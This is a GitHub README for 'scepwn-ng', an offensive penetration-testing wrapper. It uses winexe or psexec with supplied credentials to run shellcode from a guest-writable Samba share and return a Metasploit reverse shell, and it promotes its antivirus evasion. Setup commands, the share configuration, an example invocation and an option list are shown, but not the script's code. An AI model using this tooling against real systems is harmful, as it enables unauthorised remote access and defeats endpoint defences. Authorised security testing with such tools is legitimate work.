Skip to content
A winexe/psexec wrapper to use sce and a msfvenom generated payload on a target system
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.

scepwn-ng @thejosko


scepwn-ng is a wrapper script for launching winexe/psexec at a target, which then runs shellcode exec from a samba share with a msf generated reverse shell. As the executable never touches disk, it is highly effective at evading a/v.


Basic Setup for a kali box (skyfire):

		$ cd /opt
		$ git clone
		$ cd impacket; python install
		$ cd /opt; git clone

If not using Kali, you will also need to install metasploit and winexe, as well as manually setup the samba share:

Add a share to your samba conf - usually located at /etc/samba/smb.conf

		browseable = no
		path = /var/sce_share
		guest ok = yes
		read only = no
		create mask = 0600
		directory mask = 0700


	./scepwn-ng.rb [optional]


	./scepwn-ng.rb -u 'Administrator%Password1' -t -s psexec -p 4444

Note - All options are just that.. optional. If you leave anything out it will ask you for it.


	-t, --target TARGET              
																	Target IP address
	-u, --user CREDENTIALS           
																	Credentials in DOMAIN/USERNAME%PASSWORD format
	-p, --port PORT                  
																	Reverse shell port number (default: 443)
	-s, --service SERVICE            
																	winexe or psexec (default: winexe)
	-h, --help                       
																	Display this screen
You can’t perform that action at this time.